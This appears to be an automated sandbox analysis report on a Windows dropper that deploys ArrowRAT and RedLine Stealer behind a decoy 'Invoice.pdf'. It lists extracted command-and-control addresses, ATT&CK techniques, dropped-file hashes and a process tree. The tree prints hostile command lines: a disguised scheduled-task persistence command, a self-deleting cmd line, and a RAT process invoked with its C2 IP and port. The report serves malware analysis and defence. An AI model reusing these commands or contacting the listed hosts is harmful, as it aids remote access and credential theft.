Analysis

  • max time kernel
    271s
  • max time network
    181s
  • platform
    windows10-1703_x64
  • resource
    win10-20220901-en
  • resource tags

    arch:x64arch:x86image:win10-20220901-enlocale:en-usos:windows10-1703-x64system
  • submitted
    11-11-2022 22:18

General

  • Target

    6c90b6acb49fff4969b5f5fabde4b4fea363e1902ac675ba02e7ad325804b7d4.exe

  • Size

    18.4MB

  • MD5

    464502cbaae7b9ed1cd6da844d38ba86

  • SHA1

    30dd42539cbfad04564f9db45ca40f2b9e81546c

  • SHA256

    6c90b6acb49fff4969b5f5fabde4b4fea363e1902ac675ba02e7ad325804b7d4

  • SHA512

    e74b45702eeaca95bc6c9f2aeea8a5958a425dc1f45ecfb127e286a39eb668243b41e56c705ae5fe7a72ff1ab691948adf29ddd6de18509421fa415647a36b59

  • SSDEEP

    98304:2pgc9WBd2/ojIbrK51bnqvMwqwWhWznbdyxDDFC4B14d+iXLfg0rf2a33OXA7zTg:2pgnBkbYEMUWIzbdyxDDFCXpZU

Malware Config

Extracted

Family

arrowrat

Botnet

Client

C2

213.239.219.58:1337

Mutex

nPxRArUjc

Extracted

Family

redline

Botnet

@NoxyCloud

C2

85.192.63.57:34210

Attributes
  • auth_value

    20dc074852db65a2b74addf964cf576e

Signatures

  • ArrowRat

    Remote access tool with various capabilities first seen in late 2021.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine payload 1 IoCs
  • Suspicious use of NtCreateUserProcessOtherParentProcess 2 IoCs
  • Downloads MZ/PE file
  • Executes dropped EXE 3 IoCs
  • Modifies Installed Components in the registry 2 TTPs 1 IoCs
  • Loads dropped DLL 2 IoCs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Enumerates connected drives 3 TTPs 1 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Suspicious use of SetThreadContext 4 IoCs
  • Drops file in Windows directory 3 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Checks SCSI registry key(s) 3 TTPs 22 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Enumerates system info in registry 2 TTPs 2 IoCs
  • Modifies Internet Explorer settings 1 TTPs 1 IoCs
  • Modifies registry class 30 IoCs
  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 56 IoCs
  • Suspicious use of AdjustPrivilegeToken 34 IoCs
  • Suspicious use of FindShellTrayWindow 35 IoCs
  • Suspicious use of SendNotifyMessage 21 IoCs
  • Suspicious use of SetWindowsHookEx 9 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • c:\windows\system32\taskhostw.exe
    taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
    1⤵
      PID:2520
    • C:\Users\Admin\AppData\Local\Temp\6c90b6acb49fff4969b5f5fabde4b4fea363e1902ac675ba02e7ad325804b7d4.exe
      "C:\Users\Admin\AppData\Local\Temp\6c90b6acb49fff4969b5f5fabde4b4fea363e1902ac675ba02e7ad325804b7d4.exe"
      1⤵
      • Suspicious use of SetThreadContext
      • Suspicious use of WriteProcessMemory
      PID:2696
      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
        2⤵
        • Modifies registry class
        • Suspicious use of SetWindowsHookEx
        • Suspicious use of WriteProcessMemory
        PID:1816
        • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
          "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" "C:\Users\Admin\AppData\Local\Temp\Invoice.pdf"
          3⤵
          • Checks processor information in registry
          • Modifies Internet Explorer settings
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of FindShellTrayWindow
          • Suspicious use of SetWindowsHookEx
          • Suspicious use of WriteProcessMemory
          PID:4980
          • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
            "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=16514043
            4⤵
            • Suspicious use of WriteProcessMemory
            PID:4460
            • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
              "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=4F190443452AD353EF790E8A574734A4 --mojo-platform-channel-handle=1616 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
              5⤵
                PID:2280
              • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=6AB0B69C349754120A6133D8149ECD37 --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=1 --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=6AB0B69C349754120A6133D8149ECD37 --renderer-client-id=2 --mojo-platform-channel-handle=1628 --allow-no-sandbox-job /prefetch:1
                5⤵
                  PID:2076
                • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                  "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=2D2B81FC7BA54264146ADED0C1CE3669 --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=1 --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=2D2B81FC7BA54264146ADED0C1CE3669 --renderer-client-id=4 --mojo-platform-channel-handle=1972 --allow-no-sandbox-job /prefetch:1
                  5⤵
                    PID:2372
                  • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                    "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=0962D6C105986E76E8C23D418795F437 --mojo-platform-channel-handle=2476 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
                    5⤵
                      PID:1516
                    • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                      "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=06AB5E3251FA1DEBFE059145F54617D9 --mojo-platform-channel-handle=2792 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
                      5⤵
                        PID:4160
                      • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                        "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=03D054C346CE480C25032F2F108DA67B --mojo-platform-channel-handle=2076 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
                        5⤵
                          PID:1500
                      • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                        "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=16514043
                        4⤵
                          PID:3932
                      • C:\Users\Admin\AppData\Local\Temp\MRH.exe
                        "C:\Users\Admin\AppData\Local\Temp\MRH.exe" 0
                        3⤵
                        • Executes dropped EXE
                        • Suspicious behavior: EnumeratesProcesses
                        PID:3836
                        • C:\Windows\SysWOW64\schtasks.exe
                          "C:\Windows\system32\schtasks.exe" /create /tn COMSurrogate /f /sc onlogon /rl highest /tr "C:\Users\Admin\Yisike quoquola fika quaveb\Quoko tace wesa.exe"
                          4⤵
                          • Creates scheduled task(s)
                          PID:1864
                        • C:\Users\Admin\Yisike quoquola fika quaveb\Quoko tace wesa.exe
                          "C:\Users\Admin\Yisike quoquola fika quaveb\Quoko tace wesa.exe" 0
                          4⤵
                          • Suspicious use of NtCreateUserProcessOtherParentProcess
                          • Executes dropped EXE
                          • Loads dropped DLL
                          • Suspicious use of SetThreadContext
                          • Suspicious behavior: EnumeratesProcesses
                          PID:4292
                          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                            "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                            5⤵
                            • Suspicious use of SetThreadContext
                            • Suspicious behavior: EnumeratesProcesses
                            • Suspicious use of AdjustPrivilegeToken
                            • Suspicious use of SetWindowsHookEx
                            PID:4684
                            • C:\Windows\explorer.exe
                              "C:\Windows\explorer.exe"
                              6⤵
                              • Modifies Installed Components in the registry
                              • Enumerates connected drives
                              • Drops file in Windows directory
                              • Checks SCSI registry key(s)
                              • Modifies registry class
                              • Suspicious use of AdjustPrivilegeToken
                              • Suspicious use of FindShellTrayWindow
                              • Suspicious use of SendNotifyMessage
                              PID:4396
                              • C:\Windows\system32\ctfmon.exe
                                ctfmon.exe
                                7⤵
                                  PID:3840
                              • C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                "C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" Client 213.239.219.58 1337 nPxRArUjc
                                6⤵
                                  PID:2636
                            • C:\Windows\SysWOW64\cmd.exe
                              "C:\Windows\System32\cmd.exe" /c chcp 65001 && ping 127.0.0.1 && DEL /F /S /Q /A "C:\Users\Admin\AppData\Local\Temp\MRH.exe"
                              4⤵
                                PID:4776
                                • C:\Windows\SysWOW64\chcp.com
                                  chcp 65001
                                  5⤵
                                    PID:1328
                                  • C:\Windows\SysWOW64\PING.EXE
                                    ping 127.0.0.1
                                    5⤵
                                    • Runs ping.exe
                                    PID:4016
                              • C:\Users\Admin\AppData\Local\Temp\ROR.exe
                                "C:\Users\Admin\AppData\Local\Temp\ROR.exe" 0
                                3⤵
                                • Suspicious use of NtCreateUserProcessOtherParentProcess
                                • Executes dropped EXE
                                • Loads dropped DLL
                                • Suspicious use of SetThreadContext
                                • Suspicious behavior: EnumeratesProcesses
                                PID:3436
                                • C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                                  4⤵
                                  • Suspicious behavior: EnumeratesProcesses
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:1924
                          • C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                            "C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe" -ServerName:CortanaUI.AppXa50dqqa5gqv4a428c9y1jjw7m3btvepj.mca
                            1⤵
                            • Drops file in Windows directory
                            • Enumerates system info in registry
                            • Modifies registry class
                            • Suspicious use of SetWindowsHookEx
                            PID:4936

                          Network

                          MITRE ATT&CK Matrix ATT&CK v6

                          Execution

                          Scheduled Task

                          1
                          T1053

                          Persistence

                          Registry Run Keys / Startup Folder

                          1
                          T1060

                          Scheduled Task

                          1
                          T1053

                          Privilege Escalation

                          Scheduled Task

                          1
                          T1053

                          Defense Evasion

                          Modify Registry

                          2
                          T1112

                          Credential Access

                          Credentials in Files

                          1
                          T1081

                          Discovery

                          Query Registry

                          4
                          T1012

                          Peripheral Device Discovery

                          2
                          T1120

                          System Information Discovery

                          5
                          T1082

                          Remote System Discovery

                          1
                          T1018

                          Collection

                          Data from Local System

                          1
                          T1005

                          Replay Monitor

                          Loading Replay Monitor...

                          Downloads

                          • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751
                            Filesize

                            717B

                            MD5

                            ec8ff3b1ded0246437b1472c69dd1811

                            SHA1

                            d813e874c2524e3a7da6c466c67854ad16800326

                            SHA256

                            e634c2d1ed20e0638c95597adf4c9d392ebab932d3353f18af1e4421f4bb9cab

                            SHA512

                            e967b804cbf2d6da30a532cbc62557d09bd236807790040c6bee5584a482dc09d724fc1d9ac0de6aa5b4e8b1fff72c8ab3206222cc2c95a91035754ac1257552

                          • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751
                            Filesize

                            192B

                            MD5

                            5d64148d546c58f4dda5fcc29f1e8381

                            SHA1

                            c64f81d90f8c0e62a0812091f2d5d2d3d07f76c4

                            SHA256

                            80f210dd4bf36892eb9f32a47bbfc72accc6bdcad9dfc7e4c45b98399a577300

                            SHA512

                            a41449de9232b1c26a48e5b6ab4e5051d3271bd6ada684bc620725324f4d2db920dd722ef8b6a867999d2ea62859675454a96aa0fecf2a07dc12f18f03a7cc2c

                          • C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\UF5SCB4I\library[1].bin
                            Filesize

                            259KB

                            MD5

                            94aafe6b249b7f529f9d66a6f7d0b80e

                            SHA1

                            a83eee4aa9c936a8e423c4b2b7d2b1036a9a0c44

                            SHA256

                            41c631caa7c9e95166917bec39627c488400d180622e4b2bb3a3629732692b54

                            SHA512

                            e94befd6c2462bbab13e0e66569c78d34d075f15a9923713f9e72bbd7f791103ef20161b7f830a9ad1f2745ccd9e60bbbe7540f87c025d3be4b0dba3d546d5cb

                          • C:\Users\Admin\AppData\Local\Temp\Invoice.pdf
                            Filesize

                            163KB

                            MD5

                            5441d36f8dcfdd31e75562b380bea7a8

                            SHA1

                            70053ce7491743efacaa4b40f452efb3f32df4e8

                            SHA256

                            58098a6f25d3fb423b49a97cf917a406c5841d7ac792ef04ecb9646f5629baf3

                            SHA512

                            06a19ace54e2ccb25faaba3dce7a4b72010d1002efbd5d3e1cab1f23493dd8ada55803e9cd695a79c6030204224a84c5192b334b2e8c1007713e1f472f645bbe

                          • C:\Users\Admin\AppData\Local\Temp\MRH.exe
                            Filesize

                            1.9MB

                            MD5

                            18585735c8866b21e2723a6f020bafd0

                            SHA1

                            afb5b2c9d5ca57501835b0c56fd97b0641f01d88

                            SHA256

                            e9c817d02acaf2fbb59a0a44be05dbb284ee622f50b2e2a598daac8bfb564672

                            SHA512

                            88516af4bbbd9562a9ae9840124c6f9f1402f9a15a0ace5e2413023bbd80c37aa441cc39b8b48f8ca58f4192273e16cd590cd2e9e9a4298f6ed5b0497d54e6b8

                          • C:\Users\Admin\AppData\Local\Temp\MRH.exe
                            Filesize

                            1.9MB

                            MD5

                            18585735c8866b21e2723a6f020bafd0

                            SHA1

                            afb5b2c9d5ca57501835b0c56fd97b0641f01d88

                            SHA256

                            e9c817d02acaf2fbb59a0a44be05dbb284ee622f50b2e2a598daac8bfb564672

                            SHA512

                            88516af4bbbd9562a9ae9840124c6f9f1402f9a15a0ace5e2413023bbd80c37aa441cc39b8b48f8ca58f4192273e16cd590cd2e9e9a4298f6ed5b0497d54e6b8

                          • C:\Users\Admin\AppData\Local\Temp\ROR.exe
                            Filesize

                            1.7MB

                            MD5

                            85ea4565608d2f6c35decb6ed8547749

                            SHA1

                            e15ae6c93c9e998b030609fdf4b3274925694229

                            SHA256

                            f6706aafbeb4e8e10478bb1fd5b171e2f7f13399416344aba46233593e6f5d69

                            SHA512

                            762b5e5293067c484ca54fa297f5770217275a7594083b64b15ed65955f64ba158bbf58a7713419c2dc15d265a7bf8c85b4f11c8fd27e62ba21f429493df4dd5

                          • C:\Users\Admin\AppData\Local\Temp\ROR.exe
                            Filesize

                            1.7MB

                            MD5

                            85ea4565608d2f6c35decb6ed8547749

                            SHA1

                            e15ae6c93c9e998b030609fdf4b3274925694229

                            SHA256

                            f6706aafbeb4e8e10478bb1fd5b171e2f7f13399416344aba46233593e6f5d69

                            SHA512

                            762b5e5293067c484ca54fa297f5770217275a7594083b64b15ed65955f64ba158bbf58a7713419c2dc15d265a7bf8c85b4f11c8fd27e62ba21f429493df4dd5

                          • C:\Users\Admin\Yisike quoquola fika quaveb\Quoko tace wesa.exe
                            Filesize

                            791.9MB

                            MD5

                            fd4809bce583d2d55159ac2dcd0ed63b

                            SHA1

                            ebee6725bc487284a50f6c625303f5ef4bf6da8d

                            SHA256

                            3fa2374386c324c636e0af5fac103b96dd7268f8a9f065a12cc829527f696e0b

                            SHA512

                            5808ac7062773a0e36552e601694253993756c77d942e40e15c013de6706b0ef280183455b10021a1c2db1cd2a1ff415ec4cb76d803075e2e738d4a415dbf6be

                          • C:\Users\Admin\Yisike quoquola fika quaveb\Quoko tace wesa.exe
                            Filesize

                            791.9MB

                            MD5

                            fd4809bce583d2d55159ac2dcd0ed63b

                            SHA1

                            ebee6725bc487284a50f6c625303f5ef4bf6da8d

                            SHA256

                            3fa2374386c324c636e0af5fac103b96dd7268f8a9f065a12cc829527f696e0b

                            SHA512

                            5808ac7062773a0e36552e601694253993756c77d942e40e15c013de6706b0ef280183455b10021a1c2db1cd2a1ff415ec4cb76d803075e2e738d4a415dbf6be

                          • \Users\Admin\AppData\Local\Temp\advapi32.dll
                            Filesize

                            262KB

                            MD5

                            1b51fec95f5403305749c4bcb3485b14

                            SHA1

                            f4974196213a94911c850504924f38cd9e7fe889

                            SHA256

                            3c0d3f9a776c503eca4e0a014006fe1a8f53e5e22138f6add9e45ad0fbf8844e

                            SHA512

                            6e8aa862cb2d95fe67c212de2ee59f903a3de6e16bdd87918e31bc2d7de9a1bdd61f756f1bdf35aa41c7e3620650b9ad9bbaa65487d7152fdf7420767a91e90d

                          • \Users\Admin\AppData\Local\Temp\advapi32.exe
                            Filesize

                            262KB

                            MD5

                            1b51fec95f5403305749c4bcb3485b14

                            SHA1

                            f4974196213a94911c850504924f38cd9e7fe889

                            SHA256

                            3c0d3f9a776c503eca4e0a014006fe1a8f53e5e22138f6add9e45ad0fbf8844e

                            SHA512

                            6e8aa862cb2d95fe67c212de2ee59f903a3de6e16bdd87918e31bc2d7de9a1bdd61f756f1bdf35aa41c7e3620650b9ad9bbaa65487d7152fdf7420767a91e90d

                          • memory/1328-1171-0x0000000000000000-mapping.dmp
                          • memory/1500-965-0x0000000000000000-mapping.dmp
                          • memory/1516-763-0x0000000000000000-mapping.dmp
                          • memory/1816-153-0x0000000077890000-0x0000000077A1E000-memory.dmp
                            Filesize

                            1.6MB

                          • memory/1816-185-0x0000000077890000-0x0000000077A1E000-memory.dmp
                            Filesize

                            1.6MB

                          • memory/1816-137-0x0000000077890000-0x0000000077A1E000-memory.dmp
                            Filesize

                            1.6MB

                          • memory/1816-139-0x0000000077890000-0x0000000077A1E000-memory.dmp
                            Filesize

                            1.6MB

                          • memory/1816-140-0x0000000077890000-0x0000000077A1E000-memory.dmp
                            Filesize

                            1.6MB

                          • memory/1816-141-0x0000000077890000-0x0000000077A1E000-memory.dmp
                            Filesize

                            1.6MB

                          • memory/1816-143-0x0000000077890000-0x0000000077A1E000-memory.dmp
                            Filesize

                            1.6MB

                          • memory/1816-144-0x0000000077890000-0x0000000077A1E000-memory.dmp
                            Filesize

                            1.6MB

                          • memory/1816-142-0x0000000077890000-0x0000000077A1E000-memory.dmp
                            Filesize

                            1.6MB

                          • memory/1816-145-0x0000000077890000-0x0000000077A1E000-memory.dmp
                            Filesize

                            1.6MB

                          • memory/1816-146-0x0000000077890000-0x0000000077A1E000-memory.dmp
                            Filesize

                            1.6MB

                          • memory/1816-147-0x0000000077890000-0x0000000077A1E000-memory.dmp
                            Filesize

                            1.6MB

                          • memory/1816-148-0x0000000077890000-0x0000000077A1E000-memory.dmp
                            Filesize

                            1.6MB

                          • memory/1816-149-0x0000000077890000-0x0000000077A1E000-memory.dmp
                            Filesize

                            1.6MB

                          • memory/1816-150-0x0000000077890000-0x0000000077A1E000-memory.dmp
                            Filesize

                            1.6MB

                          • memory/1816-151-0x0000000077890000-0x0000000077A1E000-memory.dmp
                            Filesize

                            1.6MB

                          • memory/1816-122-0x0000000000400000-0x0000000000405000-memory.dmp
                            Filesize

                            20KB

                          • memory/1816-154-0x0000000077890000-0x0000000077A1E000-memory.dmp
                            Filesize

                            1.6MB

                          • memory/1816-156-0x0000000077890000-0x0000000077A1E000-memory.dmp
                            Filesize

                            1.6MB

                          • memory/1816-157-0x0000000077890000-0x0000000077A1E000-memory.dmp
                            Filesize

                            1.6MB

                          • memory/1816-158-0x0000000077890000-0x0000000077A1E000-memory.dmp
                            Filesize

                            1.6MB

                          • memory/1816-159-0x0000000077890000-0x0000000077A1E000-memory.dmp
                            Filesize

                            1.6MB

                          • memory/1816-160-0x0000000077890000-0x0000000077A1E000-memory.dmp
                            Filesize

                            1.6MB

                          • memory/1816-161-0x0000000077890000-0x0000000077A1E000-memory.dmp
                            Filesize

                            1.6MB

                          • memory/1816-162-0x0000000077890000-0x0000000077A1E000-memory.dmp
                            Filesize

                            1.6MB

                          • memory/1816-164-0x0000000077890000-0x0000000077A1E000-memory.dmp
                            Filesize

                            1.6MB

                          • memory/1816-163-0x0000000077890000-0x0000000077A1E000-memory.dmp
                            Filesize

                            1.6MB

                          • memory/1816-165-0x0000000077890000-0x0000000077A1E000-memory.dmp
                            Filesize

                            1.6MB

                          • memory/1816-166-0x0000000077890000-0x0000000077A1E000-memory.dmp
                            Filesize

                            1.6MB

                          • memory/1816-167-0x0000000077890000-0x0000000077A1E000-memory.dmp
                            Filesize

                            1.6MB

                          • memory/1816-168-0x0000000077890000-0x0000000077A1E000-memory.dmp
                            Filesize

                            1.6MB

                          • memory/1816-169-0x0000000077890000-0x0000000077A1E000-memory.dmp
                            Filesize

                            1.6MB

                          • memory/1816-170-0x0000000077890000-0x0000000077A1E000-memory.dmp
                            Filesize

                            1.6MB

                          • memory/1816-171-0x0000000077890000-0x0000000077A1E000-memory.dmp
                            Filesize

                            1.6MB

                          • memory/1816-172-0x0000000077890000-0x0000000077A1E000-memory.dmp
                            Filesize

                            1.6MB

                          • memory/1816-173-0x0000000077890000-0x0000000077A1E000-memory.dmp
                            Filesize

                            1.6MB

                          • memory/1816-175-0x0000000077890000-0x0000000077A1E000-memory.dmp
                            Filesize

                            1.6MB

                          • memory/1816-174-0x0000000077890000-0x0000000077A1E000-memory.dmp
                            Filesize

                            1.6MB

                          • memory/1816-176-0x0000000077890000-0x0000000077A1E000-memory.dmp
                            Filesize

                            1.6MB

                          • memory/1816-177-0x0000000077890000-0x0000000077A1E000-memory.dmp
                            Filesize

                            1.6MB

                          • memory/1816-178-0x0000000077890000-0x0000000077A1E000-memory.dmp
                            Filesize

                            1.6MB

                          • memory/1816-179-0x0000000077890000-0x0000000077A1E000-memory.dmp
                            Filesize

                            1.6MB

